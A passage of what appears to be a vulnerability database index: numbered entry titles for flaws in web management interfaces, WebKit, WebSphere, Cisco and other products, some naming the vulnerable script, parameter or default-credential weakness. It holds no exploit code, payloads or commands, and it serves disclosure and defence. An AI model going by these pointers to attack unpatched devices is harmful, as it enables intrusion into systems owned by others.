(ROS) Web-based Management Interface Invalid URL Device Reboot DoS [89357] Edge-CorE WA2121 Mini AP Router Web Interface Default Admin Credentials [89355] Accton WA5001 Wireless Router Web Interface Default Admin Credentials [89347] SonicWALL Multiple Product Web Interface skipSessionCheck Parameter Authentication Bypass [89302] Trimble Infrastructure GNSS Series Receivers Web Interface Unspecified XSS [88413] Huawei E585 Web Management Interface Web Request Parsing NULL Pointer Dereference Remote DoS [88412] Huawei E585 Web Management Interface Session Validation Authentication Bypass [88411] Huawei E585 Web Management Interface Web Request Parsing Traversal Arbitrary File Access [87621] IBM WebSphere DataPower XC10 Management Interface Access Restriction Weakness Remote DoS [86412] Foscam IP Cameras Web Interface Authentication Bypass [86315] Oracle E-Business Suite Oracle iStore Component Web interface Subcomponent Unspecified Remote Issue (2012-5058) [86314] Oracle E-Business Suite Oracle iStore Component Web interface Subcomponent Unspecified Remote Issue (2012-3138) [85662] Webify Multiple Product Admin Interface Arbitrary File Deletion [85102] Websense Multiple Product TRITON Management Console Investigative Reports Web Interface Unspecified Remote Command Execution [84977] Conceptronic Multiple Product Web Management Interface Client-side JavaScript Admin Authentication Bypass [84976] Sitecom MD-253 / MD-254 Web Management Interface JavaScript Admin Authentication Bypass [84259] SMC SMC8024L2 Web Interface Multiple HTML File Direct Request Admin Authentication Bypass [84098] Red Hat Certificate System Web Interface Certificate Revocation Request Parsing Certificate Authority (CA) Certificate Revocation [83737] Cisco TelePresence Immersive Endpoint TelepPresence Admin Web Interface Malformed Request Parsing Remote Command Execution [83729] Cisco TelePresence Recording Server Admin Web Interface Malformed Request Parsing Remote Command Execution [83495] Novell GroupWise WebAccess Interface User.interface Parameter Traversal Arbitrary File Access [83117] Huawei HG866 Session Validation Web Interface Admin Password Manipulation [82963] PacketFence Web Admin Guest Management Interface Unspecified XSS [82502] Bloxx Web Filtering Admin Interface Multiple Function CSRF [82399] Bloxx Web Filtering Admin Interface Report Viewing XSS [81839] TP-LINK 8840T Router WAN Interface Web-based Administration Remote Administator Authentication Bypass [81838] NETGEAR ProSafe FVS318N Firewall WAN Interface Web-based Administration Remote Administator Authentication Bypass [81804] Websense Multiple Product Report Management Web Interface explorer_wse/detail.exe dTitle Parameter XSS [81033] Siemens Scalance Firewall Web Configuration Interface Zero Delay Failed Login Brute Force Weakness [81026] Novell iManager Web Interface jclient Create Attribute Function EnteredAttrName Parameter Parsing Remote Overflow [80286] Enterasys SecureStack Web Interface Console Multiple Module XSS [80223] Aruba Remote Access Point Diagnostic Web Interface Form Element Parsing Shell Command Execution [80222] Citrix XenServer vSwitch Controller Component Management Web Interface Multiple Unspecified Issues [79505] Cisco Small Business SRP520 / SRP540 Series Web Interface HTTP Request Parsing Remote Command Execution [79398] Samsung DWCD Web Interface Default Password (Femtocell) [79310] Citrix XenServer Web Self Service Management Web Interface Multiple Unspecified Remote Issues [78999] Enigma2 Webinterface file Parameter Traversal Arbitrary File Access [78782] WAGO I/O System 750 PLC Web Interface Multiple File Information Disclosure [78401] Oracle WebLogic Server WLS-Console Management Interface Unspecified XSS [78067] op5 Monitor Web Interface Error Message Credentials Disclosure [78002] Websense Multiple Product Report Management Web Interface explorer_wse/favorites.exe Cookie Parsing Authentication Bypass [78000] Websense Multiple Product Report Management Web Interface explorer_wse/favorites.exe favName Parameter XSS [77589] HomeSeer HS2 Web Interface/ctrl URL Admin Command CSRF [77588] HomeSeer HS2 Web Interface Log Viewer Page URI XSS [77587] HomeSeer HS2 Web Interface Traversal Arbitrary File Access [77573] D-Link ShareCenter DNS-320 Administrative Web Interface Authentication Bypass Remote Shutdown/Restart DoS [77375] Virtual Vertex Muster Web Interface Traversal Arbitrary File Access [77154] Juniper Junos J-Web Interface Administrator Log XSS [77146] Juniper Junos J-Web Interface debug.php Unauthenticated Debug Access [76838] Cisco Small Business SRP520 / SRP540 Series Services Ready Platform Configuration Utility Web Interface Remote Shell Command Execution [76585] McAfee Web Gateway Web Interface Unspecified XSS [76146] SonicWALL Web Admin Interface main.html Multiple Field XSS [76134] OfficeWatch Call Accounting Web Interface Unspecified Traversal Arbitrary File Access [75212] LifeSize Room Appliance Web Interface gateway.php LSRoom_Remoting.doCommand Function Remote Command Injection [75211] LifeSize Room Appliance Web Interface gateway.php LSRoom_Remoting.authenticate Function AMF Data true Status Remote Authentication Bypass [74222] D-Link DPH 150s IP Phone Web Management Interface Remote DoS [74221] D-Link DPH 150s IP Phone Web Management Interface LCD Display Message Manipulation [74220] D-Link DPH 150s IP Phone Web Management Interface Arbitrary Configuration File Upload [74219] D-Link DPH 150s IP Phone Web Management Interface Admin Credential Disclosure [73987] Cisco SA 500 Series Web Management Interface Unspecified Command Execution [73986] Cisco SA 500 Series Web Management Interface Login Form SQL Injection [73659] Aruba Mobility Controller / AirWave Administration Web Interface SSID XSS [73638] PORTech MV-372 VoIP GSM Gateway Administrative Web Interface Access Restriction Bypass [73471] ZyXEL ZyWALL Appliances Management Web Interface isAdmin Privilege Escalation [73374] Intellicom NetBiter webSCADA WS100/WS200 Web Interface Default Credentials [73228] H3C ER5100 Router Web Interface userLogin.asp Authentication Bypass [72760] AnyMacro Mail System Web Interface Unspecified Traversal Arbitrary File Access [72619] Cisco RVS4000 / WRVS4400N Gigabit Routers Web Management Interface Unauthenticated Private SSL Key Disclosure [72618] Cisco RVS4000 / WRVS4400N Gigabit Routers Web Management Interface Multiple Test Parameter Arbitrary Command Execution [72617] Cisco RVS4000 / WRVS4400N Gigabit Routers Web Management Interface Unauthenticated Backup Configuration File Disclosure [72602] Cisco TelePresence Administrative Web Interface Unspecified Servlet Access Remote DoS [72600] Cisco TelePresence Administrative Web Interface Crafted Request Arbitrary File Overwrite [70020] IBM WebSphere Service Registry and Repository (WSRR) EJB Interface API Request Access Control Restriction Bypass [69792] Avaya Application Enablement Services OAM Web Interface Unspecified Issue [69676] Citrix Web Interface Unspecified XSS [69451] Cisco Unified Videoconferencing (UVC) Multiple Products Web Interface Cleartext Cookies Remote Information Disclosure [69450] Cisco Unified Videoconferencing (UVC) Multiple Products Web Interface Predictable Session ID Weakness [69065] Pay Roll - Time Sheet and Punch Card Application With Web Interface login.asp EmployeeNumber Parameter SQL Injection [68292] Synology DiskStation Manager FTP Authentication Module Web Interface Login Password Local Disclosure [68026] AXIGEN Mail Server Ajax Webmail Interface Unspecified XSS [66758] UPlusFtp Server Web Interface HTTP Request Handling Unspecified Overflow [66581] SAP J2EE Web Services Navigator Interface Unspecified XSS [66512] Pre Web Host Login Interface password Parameter SQL Injection [66015] ALPHA Ethernet Adapter II Web Admin Interface Unspecified Authentication Bypass [65707] Apple iOS WebKit on iPhone / iPod IFRAME Content Display Boundary Restriction User Interface Spoofing Weakness [65569] CUPS Web Interface Form Variable Handling cupsd Process Memory Disclosure [65555] Apple Mac OS X CUPS Web Interface Settings Manipulation CSRF [65289] Juniper IVE OS Web Interface homepage.cgi Location Parameter Arbitrary Site Redirect [65288] Juniper IVE OS Web Interface /dana/nc/ncrun.cgi DSSignInURL Parameter XSS [64945] Home FTP Server Web Interface Admin Account Creation CSRF [64943] Cisco Scientific Atlanta WebSTAR DPC2100R2 Web Interface Admin Account Default Password [64942] Cisco Scientific Atlanta WebSTAR DPC2100R2 Web Interface Unspecified Page Direct Request Authentication Bypass [64669] Consona tgctlcm.dll SdcWebSecureBase Interface pluginlicense.ini ActiveX DNS Whitelist Weakness Access Restriction Bypass [64668] Consona tgctlcm.dll SdcWebSecureBase Interface Instantiation / Free ActiveX Execution Restriction Bypass [64667] Consona tgctlcm.dll SdcWebSecureBase Interface Site-locking Implementation ActiveX Execution Restriction Weakness [64499] ArubaOS HTTPS WebUI Admin Interface TLS Renegotiation Handshakes MiTM Plaintext Data Injection [63833] TANDBERG Video Communication Server Web Admin Interface helppage.php page Parameter Traversal Arbitrary File Access [63617] IBM Web Interface for Content Management (WEBi) Client Workstation Cookie Persistence Weakness Unspecified Issue [63163] Glastopf Webinterface Unspecified Session Fixation [63135] Glastopf Webinterface Multiple Unspecified SQL Injection [63134] Glastopf Webinterface Multiple Unspecified XSS [62964] 3Com Wireless 8760 Dual Radio Web Interface Authentication Bypass [62890] chumby Web Interface Shell Metacharacter Remote Command Execution [62835] Perforce P4Web Client Web Interface Unspecified Authentication Bypass [62364] HP ProCurve Switch Web Management Interface Multiple XSS [62289] Accellion File Transfer Appliance Web Interface Audit Log username Parameter XSS [62049] Cisco Unified MeetingPlace Web Server Internal Interface Crafted URL Admin Account Creation [59854] CUPS Web Interface admin/ kerberos Parameter XSS [59814] Abyss Web Server Web Management Interface Logging Failure Brute Force Attack Weakness [59806] NETGEAR RP114 Administrator Web Interface Default Password [59601] Ericsson HM220dp ADSL Modem Web Interface Admin Authentication Bypass [59556] Red-M 1050 Web Management Interface Administration Password Handling Remote Overflow [59549] NETGEAR FM114P Web Configuration Interface port Parameter Traversal Arbitrary File Access [59139] Everfocus EDR1600 Web Interface Authentication Bypass [58515] Juniper Junos J-Web Interface Multiple Script m[] Parameter XSS [58514] Juniper Junos J-Web Interface /script.php Multiple Parameter XSS [58513] Juniper Junos J-Web Interface /configuration Multiple Parameter XSS [58512] Juniper Junos J-Web Interface /diagnose Multiple Parameter XSS [58511] Juniper Junos J-Web Interface Default URI PATH_INFO Parameter XSS [57698] VMware Studio Web Interface Support Component Traversal Arbitrary File Upload [56702] Cisco Wireless LAN Controllers (WLC) Admin Web Interface Malformed Request Remote DoS [56469] Axesstel MV 410R Web Interface Client-side JavaScript Validation Bypass [56468] Axesstel MV 410R Web Interface Referring Page Redirection CSRF Weakness [56217] ATEN Multiple Devices HTTPS Web Interface Hardcoded SSL Key Weakness [55617] NETGEAR DG632 Admin Web Interface html/ Multiple Script Direct Request Authentication Bypass [55593] Huawei D100 Administrator Web Interface Default Password [55592] phion airlock Web Application Firewall (WAF) Management Interface Crafted Image Request Arbitrary Command Execution [55108] D-Link 704p Web Interface syslog.htm Malformed Query Remote DoS [54690] Samsung G3210 Web Interface Default Password [54587] OCS Inventory NG Web Interface Error Message User Account Enumeration Weakness [54461] CUPS Web Interface HTTP Host Header Validation Weakness [54133] Citrix Web Interface Unspecified XSS [54118] Rockwell Automation ControlLogix 1756-ENBT/A EtherNet/IP Bridge Module Web Interface Unspecified Information Disclosure [54117] Rockwell Automation ControlLogix 1756 EtherNet/IP Bridge Module Web Interface Unspecified Open Redirect [54116] Rockwell Automation ControlLogix 1756-ENBT/A EtherNet/IP Bridge Module Web Interface Unspecified XSS [54091] AXIGEN Mail Server Web Interface Email Message XSS [53579] Zeus Crimeware Kit Web Interface Login SQL Injection Authentication Bypass [53576] SHOUTcast Web Interface User-agent Field XSS [51847] NETGEAR SSL312 Web Interface cgi-bin/welcome/VPN_only Crafted Request Remote DoS [51116] F5 BIG-IP Web Management Interface Reconfiguration Facility Arbitrary Perl Code Injection [50291] Cobbler Web Interface Kickstart Template Manipulation Privilege Escalation [49941] Apple Safari WebKit plug-in Interface Local URL Arbitrary File Access [49884] NETGEAR WGR614 Web Interface Character Request Handling Remote DoS [49466] A-LINK WL54AP3 / WL54AP2 Web Interface CSRF [49387] Citrix Web Interface Improper Termination Session Hijack [49357] KTorrent Web Interface Plugin Multiple Variable Arbitrary PHP Code Injection [49356] KTorrent Web Interface Plugin Crafted POST Request Arbitrary Torrent File Upload [49212] Sun Integrated Lights-Out Manager Web Interface Unspecified Access Restriction Bypass [49193] Alice Gate Multiple Routers Web Interface Magic Packet Backdoor Multiple Service Restriction Bypass [49179] HP SiteScope Web Interface SNMP Trap Messages XSS [47976] Samsung DVR SHR2040 Web Interface Request Handling DoS [47925] PageR Enterprise Web Interface URI Traversal Arbitrary File Access [47879] Dreambox DM500 Web Interface URL Handling Remote DoS [47673] MailScan for Mail Server Web Admin Interface Crafted Cookie Authentication Bypass [47672] MailScan for Mail Server Web Admin Interface LOG/ Directory Direct Request Information Disclosure [47671] MailScan for Mail Server Web Admin Interface URI Traversal Arbitrary File Access [47670] MailScan for Mail Server Web Admin Interface URI XSS [47189] EMC Centera Universal Access Web Interface Username SQL Injection [46705] ServerView Web Interface (SnmpGetMibValues.exe) Crafted URL Handling Overflow [46604] Avaya SIP Enablement Services (SES) Web Admin Interface Parameter Restoration Privilege Escalation [46603] Avaya SIP Enablement Services (SES) Web Admin Interface Local Data View Configuration Arbitrary Command Execution [46602] Avaya SIP Enablement Services (SES) Web Admin Interface Server Configuration Information Disclosure [46601] Avaya SIP Enablement Services (SES) Web Admin Interface System Utility Information Disclosure [46600] Avaya SIP Enablement Services (SES) Web Admin Interface Unauthenticated Multiple Folder Arbitrary Default Script Execution [46599] Avaya SIP Enablement Services (SES) Web Admin Interface Unauthenticated Default Application Execution [46583] Avaya Communication Manager Web Interface Credential Restoration Unspecified Arbitrary Code Execution [46582] Avaya Communication Manager Web Interface Data Viewing Configuration Unspecified Arbitrary Code Execution [46581] Avaya Communication Manager Web Interface System Log Viewing Unspecified Arbitrary Code Execution [46506] Novell GroupWise WebAccess Simple Interface Unspecified XSS [46138] XEROX WorkCenter Extensible Interface Platform Web Services Unspecified Security Bypass [46043] Motion webhttpd.c read_client() Function Motion HTTP Control Interface Remote Overflow [45877] Aztech DSL600EU Router TCP Sequence Prediction Web Interface Access [45306] Aruba Mobility Controller Web Interface Multiple Unspecified XSS [45288] Citrix Access Gateway Web Portal Interface URI Session ID Disclosure [45068] WHM Interface for cPanel cpanel/whm/webmail CSRF [45044] ZyXEL ZyWALL Web Management Interface Referer HTTP Header XSS [44940] Bugzilla WebService XML-RPC Interface canconfirm Check Bypass [44645] TorrentFlux Downloaded Torrent Remote Web Interface PHP Code Execution [44156] Citrix NetScaler Web Management Interface Cookie Credentials Encryption Weakness [44155] Citrix NetScaler Web Management Interface IP Address Cookie Information Disclosure [44059] Airspan WiMAX ProST Web Management Advanced User Interface Pages Default Credentials [43884] F5 BIG-IP Web Management Interface sysLocation SNMP Configuration Field XSS [43883] F5 BIG-IP Web Management Interface sysContact SNMP Configuration Field XSS [43882] F5 BIG-IP Web Management Interface Node Object Name XSS [43356] IBM Rational ClearQuest Web Interface Multiple Parameter XSS [43037] Snom 320 SIP Phone Web Interface Unspecified XSS [43017] Snom 320 SIP Phone Web Interface CSRF [43014] Snom 320 SIP Phone Web Interface Call A Number Field Remote System Access [43011] Belkin Multiple Routers Web Interface Administrative Command Execution Authentication Bypass [42812] Adobe LiveCycle Workflow Web Management Interface Unspecified XSS [42162] Lyris ListManager Web Interface Arbitrary Account Creation / Overwrite [42161] Lyris ListManager Web Interface Arbitrary Mail List Access [42160] Lyris ListManager Web Interface List Subscriber Privilege Escalation [41089] Mailman Web Admin Interface List Info XSS [39937] Oracle Database Ultra Search Administration Web Interface Unspecified Remote Issue [39271] Citrix Web Interface On-Line Help Unspecified XSS [38789] Cerberus FTP Server Web Interface Unspecified XSS [38596] TeamSpeak WebServer TCP Query Interface Arbitrary File Access [38482] Avaya MSS / MN Administrative Web Interface Unspecified Remote DoS [37837] Fujitsu-Siemens Computers PRIMERGY BX300 Switch Blade Web Interface Authentication Cancellation Information Disclosure [37808] Yoggie Pico Web Interface cgi-bin/runDiagnostics.cgi param Variable Shell Command Injection [37462] Helm Web Hosting Control Panel interfaces/standard/FileManager.asp Multiple Parameter XSS [37461] Helm Web Hosting Control Panel interfaces/standard/domain.asp showOption Parameter XSS [37202] Bugzilla WebService (XML-RPC) Interface Time-tracking Permission Weakness Information Disclosure [36441] WebCart Management Interface Multiple XSS [36289] Pay Roll - Time Sheet and Punch Card Application With Web Interface login.asp Password Parameter SQL Injection [32959] Symantec Web Security (SWS) License Registering Interface Large File DoS [31855] J-OWAMP Web Interface JOWAMP_ShowPage.php link Parameter Remote File Inclusion [31812] XEROX WorkCentre Products Web User Interface Authentication Bypass [31805] XEROX WorkCentre Products Web User Interface Microsoft Networking Configuration Command Injection [31804] XEROX WorkCentre Products Web User Interface Scan-to-mailbox Folder Name Command Injection [31803] XEROX WorkCentre Products Web User Interface TCP/IP Hostname Command Injection [29920] AirMagnet Enterprise Web Interface Scanned SSID XSS [26652] Cisco CallManager Web Interface ccmuser/logon.asp XSS [26651] Cisco CallManager Web Interface ccmadmin/phonelist.asp pattern Parameter XSS [22858] APC PowerChute Web Interface Cleartext Authentication Credential Transmission [21615] Nortel SSL VPN Web Interface tunnelform.yaws a Variable Arbitrary Command Execution [20873] Webmin Interface File Display Content XSS [19310] Ingate Firewall/SIParator Admin Web Interface Unspecified XSS [18470] Linksys Multiple Router Web Management Interface Password Field Overflow [14867] NotifyLink Enterprise Server Web Interface User Password Disclosure [14278] Mitel 3300 ICP Web Management Interface Session Exhaustion DoS [14277] Mitel 3300 ICP Web Management Interface Session Hijacking [14232] A-V Tronics Inetserv Webmail Interface Username Overflow [13799] Infinite Interchange Web Interface Large POST Request Handling Remote DoS [13486] SOHO Routefinder 550 Web Interface Default Admin Account [12783] Dillo Web Browser a_Interface_msg() Remote Format String [12716] Soldner Secret Wars Web Interface XSS [12675] Macallan Mail Solution Web Interface Malformed URL MCPop3 Service DoS [12674] Macallan Mail Solution Web Interface Malformed URL Authentication Bypass [11693] Roxen Web Server Admin Interface Unprivileged User Access [11690] Roxen Web Server Admin Interface Database Password Disclosure [11685] Roxen Web Server Admin Interface Unprivileged User Database Modification [10847] Ipswitch IMail Webmail Interface readmail.cgi Mailbox Name DoS [10845] Ipswitch IMail Web Interface URI Referer Session Token Disclosure [10844] Ipswitch IMail Webmail Interface printmail.cgi Mailbox Name DoS [9472] Oracle PL/SQL Gateway Web Admin Interface Null Authentication [9226] ht://Check PHP Interface Web Page XSS [8891] Cisco Cache Engine Web Admin Interface Statistics Information Disclosure [8855] Cisco CSS 11000 Web Interface Malformed XML Data DoS [8854] Cisco CSS 11000 Web Interface HTTPS POST DoS [7751] Air Messenger LAN Server Webpaging Interface Arbitrary File Access [6849] Billion BIPAC-640 AE Administrative Web Interface User [6676] Request Tracker Web Interface XSS [6577] Cisco Linksys Routers Administrative Web Interface Access [6159] Trend Micro InterScan VirusWall Web Interface Direct Request Remote Configuration Manipulation [6039] eMule Web Interface POST Content Length DoS [5774] CommuniGate Pro Web Interface Arbitrary File Retrieval [5597] Cisco Aironet Web Interface Arbitrary Modification [3926] Macallan Mail Solution Web Interface Authentication Bypass [3788] NetWin SurgeFTP Web Interface URL Decoding DoS [3329] nd WebDAV Interface String Handling Multiple Overflows [3312] Webcam Watchdog Web Interface HTTP GET Request Handling Overflow [1383] Computalynx CMail Web Interface CPU Consumption DoS [1382] Computalynx CMail Web Interface Buffer Overflow [685] Cisco PIX Firewall Manager (PFM) on Windows Web Interface Traversal Arbitrary File Access [444] Cisco Catalyst Web Interface /exec Remote Command Execution [318] Sambar Server Sysadmin Web Interface Default Account [96154] National Instruments LabVIEW Application Web Server Permission Management Local Privilege Escalation [96149] Google Chrome WebVTTParser::createDocumentFragmentFromCueText Function Empty Text Handling DoS [96137] IBM Multiple Product Intelligent Platform Management Interface (IPMI) User Account Default Password [96136] IBM Multiple Product Intelligent Platform Management Interface (IPMI) RAKP Protocol Support Password Hash Remote Disclosure [96135] IBM Multiple Product Intelligent Platform Management Interface (IPMI) Plaintext Password Local Disclosure [96118] Google Web Toolkit (GWT) loadSelectionScript Method moduleName XSS [96070] Atlassian JIRA /src/main/webapp/secure/admin/user/views/deleteuserconfirm.jsp name Parameter XSS [96061] Monster Menus Module for Drupal mm_webform submodule Unauthorized Webform Submission Deletion [96057] RESTful Web Services Module for Drupal Write Operation Access Restriction Bypass [96042] WebKit FormAssociatedElement::formAttributeChanged Function Out-of-tree FormAttributeTargetObserver Creation DoS [96040] WebKit CSSParser::parseValue Function String Text-align Support DoS [96039] ownCloud user_webdavauth Unspecified Authentication Bypass [96038] ownCloud Share Interface Unspecified XSS [96030] Trustport Webfilter help.php hf Parameter Traversal Arbitrary File Access [96029] Cisco TelePresence Web Server Password Recovery Administrator Account Default Credentials [96023] Mozilla Multiple Product Web Workers XMLHttpRequest Call Handling Same Origin Policy Bypass XSS Weakness [95883] Siemens Scalance W7xx Multiple Product Command-Line Based Management Interface Unspecified Remote Code Execution [95880] Cisco WebEx Meetings Server Account Deactivation Bypass [95879] Cisco Video Surveillance VC220 Network Dome Camera / VC240 Network Bullet Camera Web UI Crafted Packet Handling Remote DoS [95877] Cisco Wide Area Application Services (WAAS) Web Service Framework Crafted Request Handling Remote Code Execution [95876] Cisco WebEx Crafted SPI Call Handling Arbitrary File Enumeration [95865] General Electric (GE) Proficy HMI/SCADA - CIMPLICITY CimWebServer.exe Password Decoding Crafted Request szPassword Field Handling Stack Buffer Overflow [95864] General Electric (GE) Proficy HMI/SCADA - CIMPLICITY CimWebServer.exe Broadcase/Init Crafted Request szOptions Field Handling Stack Buffer Overflow [95819] Cogent DataHub Web Server Component Crafted HTTP Header Handling Stack Buffer Overflow [95800] WebDisk for iOS afgetdir.ma p Parameter Remote Command Execution [95786] IBM WebSphere Commerce Cross-user Web Service Request Execution [95785] IBM Websphere Commerce REST Services Session Termination Weakness [95770] IBM WebSphere Application Server (WAS) Security Domain Level addHttpOnlyAttributeToCookies Setting Weakness [95769] IBM WebSphere Application Server (WAS) Security Configuration Incorrect Registry Property Weakness [95768] IBM WebSphere Application Server (WAS) Non-Default Custom umask Setting Incorrect File Permission Weakness [95767] IBM WebSphere Application Server (WAS) Secure / HttpOnly Flag Cookie Weakness [95766] IBM WebSphere Application Server (WAS) Properties File Base Configuration (PFBC) Local Cleartext Password Disclosure [95765] IBM WebSphere Application Server (WAS) startServer Process Configuration Manager Incorrect File Permission Weakness [95764] IBM WebSphere Application Server (WAS) Incorrect Password Authentication Attempt Logging Weakness [95703] Symantec Web Gateway /spywall/nameConfig.php Remote Command Execution [95702] Symantec Web Gateway Radius Authentication Unspecified Remote Command Execution [95700] Symantec Web Gateway /spywall/networkConfig.php Remote Command Execution [95699] Symantec Web Gateway LDAP Server Configuration Manipulation CSRF [95698] Symantec Web Gateway /spywall/edit_alert.php alertid Parameter SQL Injection [95696] Symantec Web Gateway /spywall/feedback_report.php variable Parameter SQL Injection [95695] Symantec Web Gateway /etc/sudoers Insecure Command Handling Local Privilege Escalation [95692] Symantec Web Gateway /spywall/blocked.php u Parameter XSS [95690] Symantec Web Gateway /spywall/feedback_report.php onfocus Parameter XSS [95669] Cisco WebEx Remote Support Center Action Handling Prompt Bypass [95662] Squid SNMP Interface Crafted Packets Handling Memory Leak Remote DoS [95660] Cisco Adaptive Security Appliances (ASA) WebVPN Portal Login Page Unspecified XSS [95621] IBM Cognos Command Center Web Client Web\Content\Help\ Multiple Unspecified XSS [95603] Apache Continuum web/util/GenerateRecipentNotifier.java recipient Parameter XSS [95602] Apache Continuum web/action/notifier/JabberProjectNotifierEditAction-jabberProjectNotifierSave-validation.xml Multiple Parameter XSS [95601] Apache Continuum web/action/notifier/JabberGroupNotifierEditAction-jabberProjectGroupNotifierSave-validation.xml Multiple Parameter XSS [95600] Apache Continuum web/action/ScheduleAction-saveSchedule-validation.xml Multiple Parameter XSS [95599] Apache Continuumweb/action/BuildDefinitionAction-saveBuildDefinition-validation.xml Multiple Parameter XSS [95598] Apache Continuum web/action/AddProjectAction-addProject-validation.xml Multiple Parameter XSS [95597] Apache Continuum web/action/ProjectEditAction-projectSave-validation.xml Multiple Parameter XSS [95596] Apache Continuum web/action/notifier/IrcGroupNotifierEditAction-ircProjectGroupNotifierSave-validation.xml Multiple Parameter XSS [95595] Apache Continuum web/action/notifier/IrcProjectNotifierEditAction-ircProjectNotifierSave-validation.xml Multiple Parameter XSS [95594] Apache Continuum web/action/ProjectGroupAction.java Multiple Parameter XSS [95593] Apache Continuum web/action/AddProjectGroupAction.java Multiple Parameter XSS [95592] Apache Continuum web/action/AddProjectAction.java Multiple Parameter XSS [95590] WebKit Speech Input From Script Access Arbitrary Code Execution [95581] Symantec Encryption Management Server Web Email Protection Component Encrypted Email Attachment XSS [95550] Tomcat for JBoss Enterprise Web Server / RHEL Red Hat Package Manager (RPM) Distributions Multiple Init Script Symlink Local Privilege Escalation [95523] Apache OFBiz Webtools Application View Log Screen Unspecified XSS [95496] Dustweb Image Manager for TinyMCE newfolder Action name Parameter XSS [95495] Dustweb Image Manager for TinyMCE newfolder Action Arbitrary File Upload [95492] IBM Social Media Analytics User Interface Unspecified XSS [95379] Cisco WebEx One-Click Client Password Encryption Weakness [95342] Sun Java Web Console masthead.jsp mastheadUrl / pageTitle Parameters XSS [95320] Oracle Secure Global Desktop Web UI Subcomponent Unspecified Remote Issue (2013-3782) [95319] Oracle Secure Global Desktop Web UI Subcomponent Unspecified Remote Issue (2013-3779) [95287] Oracle Agile PLM Framework Web Client (CS) Subcomponent Unspecified Remote Issue [95279] Oracle Enterprise Manager Grid Control Enterprise Manager Base Platform Component User Interface Framework Subcomponent Unspecified Remote Issue [95274] Oracle WebCenter Content Web Forms Subcomponent Unspecified Remote Issue [95273] Oracle WebCenter Content Site Studio Subcomponent Unspecified Remote Issue [95271] Oracle WebCenter Content Content Server Subcomponent Unspecified Remote Issue [95175] OpenEMR /interface/main/onotes/office_comments_full.php note Parameter XSS [95174] OpenEMR /interface/reports/custom_report_range.php end Parameter SQL Injection [95133] WebKit AccessibilityRenderObject::computeAccessibilityIsIgnored Function Bad Cast Unspecified Issue [95119] ANGLE libGLESv2/renderer/IndexBuffer.cpp StreamingIndexBufferInterface::reserveBufferSpace Function Write Position Integer Overflow [95106] Cisco Unified MeetingPlace Web Conferencing Unspecified XSS [95104] Google Chrome Non-web-accessible Extension URL Loading Weakness [95100] Google Chrome -webkit-mask Property Serialization Arbitrary Code Execution [95082] Google Chrome WebPageSerializerImpl::endTagToString Function Bad Cast Unspecified Issue [95064] Cisco TelePresence TC Software Web Portal Initial Password Configuration Authentication Bypass [95057] Intelligent Platform Management Interface (IPMI) RMCP+ Authenticated Key-Exchange Protocol (RAKP) Authentication Remote HMAC Disclosure [95049] CAREL pCOWeb Multiple Default Passwordless Accounts [94992] Adobe ColdFusion WebSockets ColdFusion Components (CFC) Public Method Invocation [94952] dl (Download Ticket Service) Admin Interface Unspecified CSRF [94951] dl (Download Ticket Service) REST Interface CSRF [94884] cPanel Web Host Manager (WHM) locale Function Privilege Escalation [94861] Parallels Plesk Website Copy Feature Hardlink Arbitrary File Access [94819] WebKit RadioInputType::handleKeydownEvent Function Use-after-free Arbitrary Code Execution [94818] WebKit AudioBuffer ArrayBuffer Neutering Use-after-free Arbitrary Code Execution [94816] WebKit dom/Element.cpp Element::setAttributeNode Function Use-after-free Arbitrary Code Execution [94815] WebKit AccessibilityRenderObject::accessibilityImageMapHitTest Function Area Element Parent Handling Bad Cast Issue [94814] WebKit HTMLMediaElement Deletion Event Handling Use-after-free Arbitrary Code Execution [94813] WebKit WebVTTElement::createEquivalentHTMLElement Function Element Creation Unspecified Issue [94809] Intelligent Platform Management Interface (IPMI) Null-length Credentials Authentication Bypass [94799] Symantec Security Information Manager Web-GUI API Query Handling Information Disclosure [94748] IBM WebSphere Application Server (WAS) Administrative Console Unspecified CSRF [94747] IBM WebSphere Application Server (WAS) OAuth Unspecified Remote Credential Disclosure [94746] IBM WebSphere Application Server (WAS) Unspecified Issue [94745] IBM WebSphere Application Server (WAS) UNIX Platform Process Initialization Local Command Execution [94744] IBM WebSphere Application Server (WAS) Administrative Console Unspecified XSS [94743] IBM WebSphere Application Server (WAS) Administrative Console Caching Weakness Local Information Disclosure [94713] IBM WebSphere MQ Multiple setuid mqm Commands Buffer Overflow [94704] libvirt virConnectListAllInterfaces() Method struct netcf_if Object Crafted Command Handling Double-free Local DoS [94676] Monroe Electronics Multiple Product Admin Web Server Predictable Session ID Generation [94609] Cisco Multiple Product Web Framework GUI HTTP / HTTPS Request Handling Remote DoS [94605] Cisco Multiple Product Web Framework Crafted URL Handling Remote Command Execution [94604] Cisco Multiple Product Web Framework IronPort Spam Quarantine (ISQ) Function TCP Connection Request Saturation Remote DoS [94603] Cisco Web Security Appliance Web Framework Crafted URL Handling Remote Command Execution [94559] WebKit AnalyserNode::AnalyserNode Function Web Audio Handling Memory Corruption [94545] IceWarp Mail Server /webmail/calendar/index.html Unspecified XSS [94467] Cisco WebEx Social Unspecified Authentication Hijack CSRF [94458] Cybozu Live for Android WebView Class Local Information Disclosure [94453] Epiphany Crafted Web Content file:/// URI Handling Arbitrary File Access [94422] IBM WebSphere Cast Iron Unspecified Information Disclosure [94418] Canon Multiple Printer Admin Interface Default Unpassworded Account [94417] Canon Multiple Printer Admin Interface Cleartext WPA2 Key Disclosure [94408] Cybozu Live for Android Web Content Handling Unspecified Arbitrary Command Execution [94395] IBM Application Manager For Smart Business Tivoli Monitoring Internal Web Server Multiple Unspecified Spoofing Weaknesses [94389] IBM WebSphere Commerce Enterprise Padding Oracle Attack User Personal Information Disclosure [94321] Galapagos Browser for Android WebView Class Local Information Disclosure [94320] Angel Browser for Android WebView Class Local Information Disclosure [94296] Siemens WinCC Web Navigator NetBIOS User Name Enumeration [94293] Siemens WinCC Web Navigator Login Screen Unspecified SQL Injection [94292] Siemens WinCC Web Navigator Unspecified Hardcoded Account [94194] Cisco Video Surveillance Operations Manager Help Page Crafted URL Handling Arbitrary Web Page Loading [94189] IBM Data Studio Web Console Unspecified Traversal Arbitrary File Access [94123] Microsoft IE Webpage Script Debugging Memory Corruption [94097] Intrasrv Simple Web Server Crafted HTTP Request Handling Remote Buffer Overflow [94013] CTERA Portal WEBDAV Authentication Account Lockout Bypass [93981] Multiple Web Server Web Banner Information Disclosure [93919] Cisco WebEx Meetings Server Event Center Module Crafted Request Handling Information Disclosure [93918] WebKit XSS Auditor URL Manipulation Weakness [93917] WebKit iframe Handling Unspecified XSS [93916] WebKit Unspecified Memory Corruption (2013-1023) [93915] WebKit Unspecified Memory Corruption (2013-1009) 